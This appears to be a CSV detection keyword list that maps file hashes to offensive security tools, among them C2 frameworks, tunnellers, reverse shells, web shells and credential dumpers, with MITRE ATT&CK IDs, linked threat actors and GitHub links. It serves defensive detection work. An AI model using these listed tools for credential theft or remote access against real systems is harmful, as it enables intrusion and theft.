"*84bd7dfacba7564afcbbbac2d2c63f9704769ef3b3bbca2259d3ab433b81dc62*",".{0,1000}84bd7dfacba7564afcbbbac2d2c63f9704769ef3b3bbca2259d3ab433b81dc62.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30210"
"*84bdf678ec3e8af21eeb0451409cc4ae3aab9e8bd4b9299e98a29ba5375fdf6e*",".{0,1000}84bdf678ec3e8af21eeb0451409cc4ae3aab9e8bd4b9299e98a29ba5375fdf6e.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","30211"
"*84cf9980dd242f2d2734d0bafada4a555d661615d41fda9184d6c029098e01a0*",".{0,1000}84cf9980dd242f2d2734d0bafada4a555d661615d41fda9184d6c029098e01a0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30213"
"*84d265868a788a2888bcfa2c6d34021670787c23a4bdd60fca1334248cd1f3c7*",".{0,1000}84d265868a788a2888bcfa2c6d34021670787c23a4bdd60fca1334248cd1f3c7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30214"
"*84d3264c0daaaed493505f366bac7e8504137bdfa73dc0618588081d544997bb*",".{0,1000}84d3264c0daaaed493505f366bac7e8504137bdfa73dc0618588081d544997bb.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","30215"
"*84d6bf44ebad6338855d9e4abafaed229c778a645c18e1bd5a343bf930c75110*",".{0,1000}84d6bf44ebad6338855d9e4abafaed229c778a645c18e1bd5a343bf930c75110.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30216"
"*84d92157948ff717a224b4dd81ceae8e300b9b363293d6417da97925b4c59ba9*",".{0,1000}84d92157948ff717a224b4dd81ceae8e300b9b363293d6417da97925b4c59ba9.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30217"
"*84dbd3a0c2e858b59822ee50b7d72972851ca692416c15c5f351831381aa4db9*",".{0,1000}84dbd3a0c2e858b59822ee50b7d72972851ca692416c15c5f351831381aa4db9.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","30218"
"*84df4aaf2b050748e52b7e61ac93739d376929cb6d00e6d8cef3c6d61b71ae0f*",".{0,1000}84df4aaf2b050748e52b7e61ac93739d376929cb6d00e6d8cef3c6d61b71ae0f.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30220"
"*84e1091e97d33b0b8ae7c600f649e0cbaf00c1b7650d965ba4ef903eee709550*",".{0,1000}84e1091e97d33b0b8ae7c600f649e0cbaf00c1b7650d965ba4ef903eee709550.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30221"
"*84e209caa4eaae874620fbba2fb4a0ab9b859aa1e82eaf7d36791854b3d0e76a*",".{0,1000}84e209caa4eaae874620fbba2fb4a0ab9b859aa1e82eaf7d36791854b3d0e76a.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","30222"
"*84e22340a39a400c26564246e013d12d3995322742ab253cef4e8a820b1194c3*",".{0,1000}84e22340a39a400c26564246e013d12d3995322742ab253cef4e8a820b1194c3.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30223"
"*84e42cfadcc56fd72ad041ad692cc880eede230412bd6cdc3bcf90523b10a98e*",".{0,1000}84e42cfadcc56fd72ad041ad692cc880eede230412bd6cdc3bcf90523b10a98e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30224"
"*84f191e9992ba2fd44147adea679f3315d3bc3a21d3c3267425017711a240da7*",".{0,1000}84f191e9992ba2fd44147adea679f3315d3bc3a21d3c3267425017711a240da7.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","30225"
"*84f94c746a47d8bee6663a57051e15ce80f6847dc66733c31b1d793301814fcb*",".{0,1000}84f94c746a47d8bee6663a57051e15ce80f6847dc66733c31b1d793301814fcb.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","#filehash","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","30227"
"*84f9a0b27d27d5eeb6d0e9a5eaffb858feefa1f5d2f0e8af9a654165e37dcf21*",".{0,1000}84f9a0b27d27d5eeb6d0e9a5eaffb858feefa1f5d2f0e8af9a654165e37dcf21.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30228"
"*84fc3746ff1c1b3bd069bc4f64bf5416b9151d980088cd902799d7997f5b3882*",".{0,1000}84fc3746ff1c1b3bd069bc4f64bf5416b9151d980088cd902799d7997f5b3882.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","0","#filehash","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","30229"
"*84fca6c04d81477223b295838e3edb59744fc564c68c614b93c33a537a066bd6*",".{0,1000}84fca6c04d81477223b295838e3edb59744fc564c68c614b93c33a537a066bd6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30230"
"*850d5195de840280e1638f121743617ad47852109636541bccd20d4cdd953d6b*",".{0,1000}850d5195de840280e1638f121743617ad47852109636541bccd20d4cdd953d6b.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","30232"
"*850e81d95da8437a509398bea9d751af6c69b97799b64042041c074bc34e6659*",".{0,1000}850e81d95da8437a509398bea9d751af6c69b97799b64042041c074bc34e6659.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30233"
"*8513ab71b3152da522168db4795fdbff36d8d190501df81d3ff986cf0019cd0f*",".{0,1000}8513ab71b3152da522168db4795fdbff36d8d190501df81d3ff986cf0019cd0f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30234"
"*851b95eb24e83b16404165f2cd2a9937b4b4ec9884bb60c0bce4297c8a67de35*",".{0,1000}851b95eb24e83b16404165f2cd2a9937b4b4ec9884bb60c0bce4297c8a67de35.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30236"
"*851bcf2dc07341e9be142b3916041942e8341a3d74080f6abe2f374b13e5fb82*",".{0,1000}851bcf2dc07341e9be142b3916041942e8341a3d74080f6abe2f374b13e5fb82.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30237"
"*851eca4c1dcbc7dfddce7496284df95a1eb57c9d6cad75bd92cd2afdae8054e2*",".{0,1000}851eca4c1dcbc7dfddce7496284df95a1eb57c9d6cad75bd92cd2afdae8054e2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30239"
"*85201dd09ccaae5169624efeb7770c78b118c05062e1b8e66eb8583b07ca08fd*",".{0,1000}85201dd09ccaae5169624efeb7770c78b118c05062e1b8e66eb8583b07ca08fd.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","30240"
"*85239f4abe215e87a147a6f63e8a281c2c3a687dcc45d430042c1e897de36696*",".{0,1000}85239f4abe215e87a147a6f63e8a281c2c3a687dcc45d430042c1e897de36696.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","#filehash","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","30241"
"*8524836909172fcdcfc6c1e805d775bdf84a499113a645d2fce7797d89af6dc7*",".{0,1000}8524836909172fcdcfc6c1e805d775bdf84a499113a645d2fce7797d89af6dc7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30242"
"*8524fbc0d73e711e69d60c64f1f1b7bef35c986705880643dd4d5e17779e586d*",".{0,1000}8524fbc0d73e711e69d60c64f1f1b7bef35c986705880643dd4d5e17779e586d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30243"
"*8524fbc0d73e711e69d60c64f1f1b7bef35c986705880643dd4d5e17779e586d*",".{0,1000}8524fbc0d73e711e69d60c64f1f1b7bef35c986705880643dd4d5e17779e586d.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","30244"
"*8529307629293748098f5a78900d1685d70131e05d2dc399be5701a89dfb0a9a*",".{0,1000}8529307629293748098f5a78900d1685d70131e05d2dc399be5701a89dfb0a9a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30245"
"*853d769d63efcbc5d78f3f81c7cae176bf34c248d3bbbf6f32b4bc5d5de561e8*",".{0,1000}853d769d63efcbc5d78f3f81c7cae176bf34c248d3bbbf6f32b4bc5d5de561e8.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","30246"
"*85474d2a885a2dbe2dfd334d9d25fbf1079c1d88c857428e2e1cf3e59f2c0a9b*",".{0,1000}85474d2a885a2dbe2dfd334d9d25fbf1079c1d88c857428e2e1cf3e59f2c0a9b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30248"
"*855322cbaedbf7d7ea08a730405d5969a4f754a75571791b357d8ddce030e89f*",".{0,1000}855322cbaedbf7d7ea08a730405d5969a4f754a75571791b357d8ddce030e89f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30249"
"*8558952E-C76B-4976-949F-76A977DA7F8A*",".{0,1000}8558952E\-C76B\-4976\-949F\-76A977DA7F8A.{0,1000}","offensive_tool_keyword","RPC-Backdoor","A basic emulation of an ""RPC Backdoor""","T1071.004","TA0011","N/A","N/A","C2","https://github.com/eladshamir/RPC-Backdoor","1","0","#GUIDproject","N/A","10","10","240","45","2022-08-25T14:37:41Z","2022-08-16T13:12:05Z","30251"
"*8559d164a6628834d0b6cf4ff457cb2d30d4960116f8c0e56e6510243f38d6f3*",".{0,1000}8559d164a6628834d0b6cf4ff457cb2d30d4960116f8c0e56e6510243f38d6f3.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30253"
"*8560ec462441496a3bd6b0266ed1b023cdb1870a190aaa9dbb34ffcc6e6dd281*",".{0,1000}8560ec462441496a3bd6b0266ed1b023cdb1870a190aaa9dbb34ffcc6e6dd281.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","30255"
"*85687380038c8fa0370f374f5bf4e087c8a34c03aee886f938f1b05be4dc3efa*",".{0,1000}85687380038c8fa0370f374f5bf4e087c8a34c03aee886f938f1b05be4dc3efa.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30256"
"*85712775f9a4080bea10df95280c55f5b120f32ec92f1cdaf0a1c55f58788a66*",".{0,1000}85712775f9a4080bea10df95280c55f5b120f32ec92f1cdaf0a1c55f58788a66.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","30257"
"*8574d9733f8ab02facc74b6b2e51a5a0f4eb5c370e005de4987586cb53b52314*",".{0,1000}8574d9733f8ab02facc74b6b2e51a5a0f4eb5c370e005de4987586cb53b52314.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30259"
"*857a3380915575e74c40f0a36d92fdb55228a3c96476e90e902b440e921be6d1*",".{0,1000}857a3380915575e74c40f0a36d92fdb55228a3c96476e90e902b440e921be6d1.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","30262"
"*857d1a53ab8df17acd27c5a26a77cdf070b2cd6e78bcbf011eef3c81dd5cd9ae*",".{0,1000}857d1a53ab8df17acd27c5a26a77cdf070b2cd6e78bcbf011eef3c81dd5cd9ae.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30263"
"*858655414a0c3c0a9d6fcb466c47a06d7c9f19c69aa5c3635fd25fd7f017bae3*",".{0,1000}858655414a0c3c0a9d6fcb466c47a06d7c9f19c69aa5c3635fd25fd7f017bae3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30264"
"*8588f8405c9048a5356cb2376ffdb20eef599763b96930818b757f4df3909841*",".{0,1000}8588f8405c9048a5356cb2376ffdb20eef599763b96930818b757f4df3909841.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30265"
"*858d9587a7b7bd18b9f1b3bafc61084475898fc185ef1e2fecdf0777e58e1531*",".{0,1000}858d9587a7b7bd18b9f1b3bafc61084475898fc185ef1e2fecdf0777e58e1531.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","30266"
"*85929c3b220867064975eb8a6ca57cd5b22b801e3f805e653f298f3e6cebe6a3*",".{0,1000}85929c3b220867064975eb8a6ca57cd5b22b801e3f805e653f298f3e6cebe6a3.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30267"
"*8596bb9703901bd2b0174aa550288f303e26f27d72a26daff201e7ea709da002*",".{0,1000}8596bb9703901bd2b0174aa550288f303e26f27d72a26daff201e7ea709da002.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","30268"
"*859f9de41d70b9ac3d1fd32c3b8f71c6b73014795e93b7c9b47ecbefc8e089ff*",".{0,1000}859f9de41d70b9ac3d1fd32c3b8f71c6b73014795e93b7c9b47ecbefc8e089ff.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30269"
"*85a5981495372d449656d4da528a0884e3bf06307f0e52756823cd474a687cc6*",".{0,1000}85a5981495372d449656d4da528a0884e3bf06307f0e52756823cd474a687cc6.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","30270"
